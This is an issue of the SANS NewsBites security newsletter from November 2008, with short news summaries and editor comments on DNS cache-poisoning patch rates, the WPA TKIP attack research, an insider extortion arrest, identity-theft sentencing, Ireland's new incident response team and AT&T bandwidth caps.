********************** Sponsored By Ounce Labs, Inc. ********************
Outsourcing is a proven strategy to reduce costs and increase value, but careful planning is required to build stringent software security requirements into contracts ensure that those requirements are met. Download this report for detailed data on how experienced outsourcers are putting in place effective processes to drive the risk out of outsourcing. http://www.sans.org/info/35229
Study Finds Some DNS Servers Still Not Patched Against Cache Poisoning Flaw (November 10, 2008)
A recent survey of Domain Name System (DNS) servers found that despite widespread press coverage given to a critical DNS vulnerability earlier this year, 25 percent of servers that allow open recursion have not yet been patched. According to the study, 45 percent of administrators responding to the survey said they lack the necessary resources to address the DNS vulnerability, and 30 percent said they do not know enough about DNS to do so. The survey also shows that 90 percent of DNS servers are running recent versions of the Berkeley Internet Name Domain, or BIND 9; there has also been a significant decrease in the use of Microsoft DNS Server, which is not highly secure. One disappointment is the low rate of adoption of DNSSec, "a security protocol that allows DNSD queries and answers to be digitally signed and authenticated;" those statistics could change as .gov domains in the US are required to implement DNSSec by the end of 2009. -http://www.gcn.com/online/vol1_no1/47524-1.html?topic=security -http://www.computerworld.com/action/article.do?command=viewArticleBasic&arti cleId=9119724&source=rss_topic17 -http://dns.measurement-factory.com/surveys/200810.html [Editors Note (Northcutt): They can be as disappointed as they want to about the rate of DNSSEC adoption, but it is hard to do. Success in security depends on either automating the fix or making it really easy for the user. ]
Researchers Publish Paper on Breaking WPA TKIP (November 6 & 10, 2008)
Two German university researchers have discovered a combination of techniques that could allow an attacker to compromise Wi-Fi Protected Access (WPA) encryption in less than 15 minutes. The attack does not result in the encryption key being discovered. Rather, the technique allows attackers "to decrypt packets and inject packets with custom content." Martin Beck and Eric Tews present their findings at the PacSec 2008 conference in Tokyo this week. The attack targets the WPA's Temporal Key Integrity Protocol (TKIP). -http://www.securityfocus.com/news/11537 -http://www.heise-online.co.uk/security/Security-experts-reveal-details-of-WPA-ha ck--/news/111922 -http://dl.aircrack-ng.org/breakingwepandwpa.pdf [Editor's Note (Ullrich): Although the attack rather limited, it highlights the fact that WPA and TKIP were meant to serve as a transitional fix for older hardware. WPA2 is the "real fix". And from Raul Siles at Internet Storm Center: This new research opens the door to new WPA/TKIP attacks and future attack enhancements, so it is time to start applying and planning the appropriate security countermeasures to remove or mitigate this and similar future threats: Update to WPA2/AES as soon as you can! Because the vulnerability is in TKIP, both WPA and WPA2 can be affected. The attack affects WPA2 if configured with TKIP because WPA2 allows both, AES and TKIP (while WPA only allows TKIP). -http://isc.sans.org/diary.html?storyid=5315]
************************* SPONSORED LINK ******************************
New Apple Exec Ordered to Stop Work for Possible Non-Compete Violation (November 8 & 10, 2008)
A judge in New York has issued a preliminary injunction ordering Apple's new executive in charge of the iPhone and the iPod to "immediately cease his employment with Apple Inc. until further order" because of a potential violation of agreement with his former employer, IBM. Mark Papermaster left IBM for Apple in October; the lawsuit alleges his move violates a non-compete clause in his contract that stipulates that he would not work for a competitor within a year of leaving his position at IBM. The crux of the issue is whether Apple and IBM are business competitors. -http://www.latimes.com/business/la-fi-briefs8-2008nov08,0,6090160.story -http://www.crn.com/hardware/212001584
ARRESTS, CHARGES, CONVICTIONS & SENTENCES
Former Sysadmin Arrested for Alleged Extortion (November 10, 2008)
A systems administrator who had recently been laid off from Third Avenue Management, a New York-based mutual fund company, has been arrested for allegedly threatening to damage his former employer's servers if they did not meet his demands. Viktor Savtyrev was one of 10 employees who lost their jobs on November 5. All were given a severance package, but several days later, Savtyrev allegedly sent email messages to several people still with the company, including the company's general counsel, saying he was "not satisfied with the terms" of his severance package and threatening to damage the computer systems unless they gave him more money and provided him with extended medical coverage and "excellent" job references. In subsequent communications, Savtyrev allegedly said he would get help attacking the servers from friends in Belarus and that he had already placed several back doors on the company's computer systems. Savtyrev was arrested at his home in Old Bridge, NJ. -http://www.computerworld.com/action/article.do?command=viewArticleBasic&arti cleId=9119792&source=rss_topic17 -http://www.nj.com/news/index.ssf/2008/11/old_bridge_computer_tech_charg.html [Editor's Note (Skoudis): This case is a great illustration for management about the importance of thorough processes for removing employees' access from computer systems after job termination. Further, for recently dismissed sysadmin employees, enterprises should conduct some check of the systems they operated to make sure they left behind nothing nefarious. (Ullrich): I guess his request for excellent job references will no longer be good much. ]
Woman Gets Four-Year Sentence for Identity Theft and Credit Card Fraud (November 7, 2008)
Kimberly Ann Mavis was sentenced to four years in federal prison without the possibility of parole for her role in an identity fraud scheme. Mavis and a co-conspirator, Jerry Bagby, gained unauthorized access to the customer database of Premier Bank in Overland Park, Kansas and used the purloined information to open credit card accounts in other people's names. Mavis and Bagby used those cards to purchase expensive items, which they later resold for cash. In August, Mavis pleaded guilty to computer fraud, conspiracy, aggravated identity theft and credit card fraud. Bagby pleaded guilty to aggravated identity theft and credit card fraud; he is awaiting sentencing. -http://www.infozine.com/news/stories/op/storiesView/sid/31730/
Former Inmate Arrested for Accessing Prison Network (November 6, 7 & 8, 2008)
Ireland Gets First Computer Emergency Response Team (November 10, 2008)
Ireland's first national Computer Security Incident Response Team was launched on Monday, November 10. The Irish Reporting and Information Security Service, known as IRISS, is a not for profit company that aims to assist businesses, organisations and individuals to better protect their computer and network systems from threats posed by Internet attacks, hackers and computer viruses. Founded by SANS NewsBites editor, Brian Honan, the Irish Reporting & Information Security Service (IRISS) will provide a range of free services to Irish businesses and consumers in relation to information security issues to help counter the security threats posed to Irish businesses and the Irish Internet space. IRISS's services are built on the WARP (Warning Advice & Reporting Point -http://www.warp.gov.uk) model and are provided by a dedicated core of volunteers drawn from Ireland's top Internet security experts with funding for the project coming from private industry, including the SANS Institute. -http://www.businessworld.ie/cgi-bin/printer_friendly?a=2345192 -http://www.iriss.ie" -http://www.businessworld.ie/livenews.htm?a=2345192;s=rollingnews.htm -http://iriss.ie/iriss/ [Editor's Note (Schultz): Starting an incident response team is one of the most challenging tasks an information security professional can undertake. I wish Brian all the success in the world. ]
Computer Misuse Arrests Doubled In Japan During 2007 (November 10, 2008)
AT&T Experiments with Downloading Limits for Broadband Customers (November 6, 2008)
AT&T has started a test program in Reno, Nevada that places a limit on the amount of downloading and uploading its broadband users are permitted each month. The amount allowed varies depending upon the type of account users have. Users who exceed their allotted limits will receive warning letters for the first two months of overages; after that, they will be charged US $1 per extra gigabyte. AT&T says the pilot program is an attempt to come up with a solution to the problem of a very small percentage of users who consume an inordinate portion of bandwidth. -http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2008/11/06/BU7G13UV7I.DTL&t sp=1 [Editor's Note (Pescatore): Hmmm, if my math is right, if I pay for 6 Mbps connectivity, if I used it 24 hours per day for a month, I could download almost 2,000 GB. The ATT plan would give me the first 80 GB free and then I would pay $1,920/month for the rest? If I only get 80 GB in a month, then I think I'm only getting 240 Kbs connectivity or so. This type of logic is like offering cellphone service pricing where you get unlimited minutes of connectivity but only 5,000 words per month.]
************************************************************************* The Editorial Board of SANS NewsBites
Eugene Schultz, Ph.D., CISM, CISSP is CTO of High Tower Software and the author/co-author of books on Unix security, Internet security, Windows NT/2000 security, incident response, and intrusion detection and prevention. He was also the co-founder and original project manager of the Department of Energy's Computer Incident Advisory Capability (CIAC).
John Pescastore is Vice President at Gartner Inc.; he has worked in computer and network security since 1978.
Ron Dick headed the National Infrastructure Protection Center (NIPC) at the FBI and is the incoming President of the InfraGard National Members Alliance - with 22,000 members.
Stephen Northcutt founded the GIAC certification and currently serves as President of the SANS Technology Institute, a post graduate level IT Security College, www.sans.edu.
Johannes Ullrich is Chief Technology Officer of the Internet Storm Center.
Howard A. Schmidt served as CSO for Microsoft and eBay and as Vice-Chair of the President's Critical Infrastructure Protection Board.
Will Pelgrin is Chief Information Security Officer of New York State, chair of the Multi-State Information Sharing and Analysis Center and co-chair of the National ISAC Council.
Ed Skoudis is co-founder of Inguardians, a security research and consulting firm, and author and lead instructor of the SANS Hacker Exploits and Incident Handling course.
Tom Liston is a Senior Security Consultant and Malware Analyst for Intelguardians, a handler for the SANS Institute's Internet Storm Center, and co-author of the book Counter Hack Reloaded.
Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a senior Lockheed Martin Fellow.
Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He is leading SANS' global initiative to improve application security.
Marcus J. Ranum built the first firewall for the White House and is widely recognized as a security products designer and industry innovator.
Mark Weatherford, CISSP, CISM, is Executive Officer of the California Office of Information Security and Privacy Protection.
Alan Paller is director of research at the SANS Institute
Clint Kreitner is the founding President and CEO of The Center for Internet Security.
Brian Honan is an independent security consultant based in Dublin, Ireland.
Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription, (and for free posters) or to update a current subscription, visit http://portal.sans.org/